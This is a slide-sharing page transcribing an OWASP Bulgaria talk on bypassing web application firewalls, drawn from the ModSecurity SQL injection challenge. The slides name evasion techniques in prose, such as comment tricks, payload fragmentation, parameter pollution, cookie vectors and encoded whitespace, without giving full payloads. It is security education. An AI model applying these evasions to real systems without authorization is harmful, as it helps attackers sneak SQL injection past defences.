Upload File

[owasp-bulgaria] g. geshev - web application firewalls from an attacker's perspective

  • Home
  • Technology
  • [OWASP-Bulgaria] G. Geshev - Web Application Firewalls from an Attacker's Perspective
43
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation OWASP http://www.owasp.org OWASP Plan - Strawman G. Geshev Chapter Leader [email protected] +359-884-237-207 03.04.10

Upload: g-geshev

Post on 11-Nov-2014

1.224 views

Category:

Technology


1 download

Report

Tags:

DESCRIPTION

 

TRANSCRIPT

  • 1. OWASP Plan - Strawman G. Geshev Chapter Leader [email protected] +359-884-237-20703.04.10 Copyright The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation http://www.owasp.org
  • 2. OWASP Plan - Strawman Cant get there from here? Georgi Geshev OWASP Bulgaria LeaderOWASP [email protected] +359-884-237-207 Copyright The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation http://www.owasp.org
  • 3. OWASP Plan - Strawman Cant get there from here? The web application Georgi Geshev firewall from OWASP Bulgaria Leader an attackers perspective.OWASP [email protected] +359-884-237-207 Copyright The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation http://www.owasp.org
  • 4. AgendaPart 1: Introduction Why would you be interested in bypassing a WAF? OWASP 4
  • 5. AgendaPart 1: Introduction Why would you be interested in bypassing a WAF?Part 2: Real-World Stories The ModSecurity SQL Injection Challenge OWASP 5
  • 6. Whos Who? Just in case you give a darn sh*tAbout me: FOSS evangelist Offsex enthusiast Bug hunter Internet troll OWASP 6
  • 7. Whos Who? Just in case you give a darn sh*tAbout me: FOSS evangelist Offsex enthusiast Bug hunter Internet troll OWASP 7
  • 8. Whos Who? Just in case you give a darn sh*tAbout me: FOSS evangelist Offsec enthusiast Bug hunter Internet troll OWASP 8
  • 9. Whos Who? Just in case you give a darn sh*tAbout me: FOSS evangelist Offsec enthusiast Bug hunter Internet troll OWASP 9
  • 10. Whos Who? Just in case you give a darn sh*tAbout me: FOSS evangelist Offsec enthusiast Bug hunter Internet troll OWASP 10
  • 11. Bypassing WAFs for fun and...Why would you hack around a WAF? OWASP 11
  • 12. Bypassing WAFs for fun and...Why would you hack around a WAF? Vulnerability assessment OWASP 12
  • 13. Bypassing WAFs for fun and...Why would you hack around a WAF? Vulnerability assessment Penetration testing scenario OWASP 13
  • 14. Bypassing WAFs for fun and...Why would you hack around a WAF? Vulnerability assessment Penetration testing scenario Improving your own product OWASP 14
  • 15. Bypassing WAFs for fun and...Why would you hack around a WAF? Vulnerability assessment Penetration testing scenario Improving your own product Just for fun? ;) OWASP 15
  • 16. What about the challenge?This is a SQL Injection and.. OWASP 16
  • 17. What about the challenge?This is a SQL Injection and Filter Evasion Challenge. OWASP 17
  • 18. What about the challenge?This is a SQL Injection and Filter Evasion Challenge. Intentionally broken demo sites OWASP 18
  • 19. What about the challenge?This is a SQL Injection and Filter Evasion Challenge. Intentionally broken demo sites Attackers traffic being passed through a WAF proxy OWASP 19
  • 20. What about the challenge?This is a SQL Injection and Filter Evasion Challenge. Intentionally broken demo sites Attackers traffic being passed through a WAF proxy Identify a SQL injection vector within the target site OWASP 20
  • 21. What about the challenge?This is a SQL Injection and Filter Evasion Challenge. Intentionally broken demo sites Attackers traffic being passed through a WAF proxy Identify a SQL injection vector within the target site Find out if theres a way to hack around the WAF proxy OWASP 21
  • 22. What about the challenge? (cont.) Targets.. IBM (AppScan) Cenzic (HailStorm) HP (WebInspect) Acunetix (Acunetix) OWASP 22
  • 23. Challenge Scenario ModSecurity Proxy TargetsHacker OWASP 23
  • 24. Challenge Scenario ModSecurity Proxy TargetsHacker OWASP 24
  • 25. Objectives..Successfully enumerate the following information: OWASP 25
  • 26. Objectives..Successfully enumerate the following information: Database Username(s) OWASP 26
  • 27. Objectives..Successfully enumerate the following information: Database Username(s) Database Name(s) OWASP 27
  • 28. Objectives..Successfully enumerate the following information: Database Username(s) Database Name(s) Table Name(s) OWASP 28
  • 29. Objectives..Successfully enumerate the following information: Database Username(s) Database Name(s) Table Name(s) Column Name(s) OWASP 29
  • 30. What about the challenge? (cont.) Levels..There are two levels. OWASP 30
  • 31. What about the challenge? (cont.) Levels..There are two levels. We focus on the second one. OWASP 31
  • 32. What about the challenge? (cont.) Levels..There are two levels. We focus on the second one. Level 1: Speed Hacking OWASP 32
  • 33. What about the challenge? (cont.) Levels..There are two levels. We focus on the second one. Level 1: Speed Hacking Level 2: Filter Evasion OWASP 33
  • 34. The Winners Johannes Dahse Vladimir Vorontsov PT Research Ahmad Maulana Travis Lee Roberto Salgado SQLMap Developers HackPlayers Georgi Geshev OWASP 34
  • 35. What about the techniques? Less known and version specific featuresEx. MySQL Comment Extensions for conditional code execution Mixture of (unterminated) commentsEx. double dash, C-style comments, etc. Splitting the query across multiple locationsEx. Multiple GET/POST parameters Parameter pollution a.k.a. HPP Less known attack vector locationsEx. Cookies, file names/contents, etc. Mixture of space separators and CR/LFsEx. %09, %0a, %0b, %0c, %0d, %a0 OWASP 35
  • 36. Examples (pt. 1) Injection Fragmentation Splitting up the SQLi payload so that each individual payload would not trigger any filters however, when placed into the back-end SQL query, they would force boolean logic of true/false. OWASP 36
  • 37. Examples (pt. 2) HTTP Parameter Pollution HPP allows an attacker to leverage how an ASP/ASP.NET-based applications treats multiple parameters with the same name - which is to concatenate the payloads into one and separating them with commas. OWASP 37
  • 38. Examples (pt. 3) Tricky Comments The intruder was able to leverage some platform and version specific attack techniques, exploiting the way the back-end database handles/interprets different types of comments. OWASP 38
  • 39. Examples (pt. 4) Unusual Locations In this case, the evasion was possible due to the attack vector location - Request Cookie data. OWASP 39
  • 40. Statistics Estimated number of participants: >650 Avg. number of Requests to find an evasion: 433 Avg. Duration (Time to find an evasion): 72 hrs Shortest number of Requests to find an evasion: 118 Shortest Duration (Time to find an evasion): 10 hrs OWASP 40
  • 41. Shout outs go to.. All the OWASP enthusiasts around the globe - For being awesome Ryan Barnett - For all the efforts P. Serafimov - For kindly contributing to this talk ;) OWASP 41
  • 42. References OWASP ModSecurity Core Rule Set Project: http://goo.gl/H3f49 Challenge Announce: http://goo.gl/88EDL Lessons Learned: http://goo.gl/gWLNP OWASP 42
  • 43. Thanks for you time!P. S. Ping me for OWASP stickers. OWASP 43

Firewalls - Columbia Universitysmb/classes/f06/l15.pdf · Why Use Firewalls? Firewalls What’s a Firewall Why Use Firewalls? Tradttional Firewalls by Analogy Should We Fix the Network

State of the Art Security from an Attacker's Viewpoint Ivan Arce · Gerardo Richarte

Firewalls IPv6

ECMAScript 6 from an Attacker's Perspective - NULLCON · ECMAScript 6 from an Attacker's Perspective Breaking Frameworks, Sandboxes, and everything else ... ECMA-377 – Holographic

6. Firewalls

Firewalls CS432. Overview What are firewalls? Types of firewalls Packet filtering firewalls Packet filtering firewalls Sateful firewalls Sateful firewalls

Firewalls Presented By Hareesh Pattipati. Outline Introduction Firewall Environments Type of Firewalls Future of Firewalls Conclusion

firewalls...Firewalls Sommario • Introduzione (Sicurezza e Firewall) • Firewalls (Da bastion host a rete di difesa) •Firewalls(Overview) • 2 Filosofie ed 1 Principio Firewalls

Georgi Geshev, warranty void if label removed

IntSec1 Firewalls

An Attacker's Day into Human Virology - Black Hat BriefingsAn Attacker's Day into Human Virology Guillaume Lovet, Axelle Apvrille Fortinet. What is a Virus ? H1N1 Flu Ebola West Nile

ART.redundant Firewalls

Firewalls and IDS 1 Firewalls and Intrusion Detection Systems

1 Firewalls Firewalls Firewalls von Hendrik Lennarz Hendrik Lennarz

Deploying Firewalls

E firewalls

firewalls - español

ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes, and everything else

Network Firewalls

Firewalls - csci530l/slides/lab-firewalls-color.pdf · What do these 2 firewalls protect? Windows ... Linux Firewalls , Michael Rash, No Starch Press, 2007 ... lab-firewalls.ppt

[OWASP-Bulgaria] G. Geshev - Chapter Introductory Lecture

Bypassing firewalls

Firewalls Opensource

State of the Art Security from an Attacker's Viewpoint State of the Art Security from an Attacker's Viewpoint Ivan Arce · Gerardo Richarte Core Security

Les Firewalls

NSC #2 - D1 02 - Georgi Geshev - Your Q is my Q

BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploitation

CSW2017 Geshev+Miller logic bug hunting in chrome on android

CVP Firewalls

UNIT 2: Firewalls Content : Firewalls in general basic operation and architecture Main border firewalls using stateful inspection Screening firewalls

Firewalls iptables

Firewalls PDF

Reduce the Attacker's ROI with Collaborative Threat Intelligence

Firewalls (6)

INFOGRAPHIC: Inside an Attacker's Playbook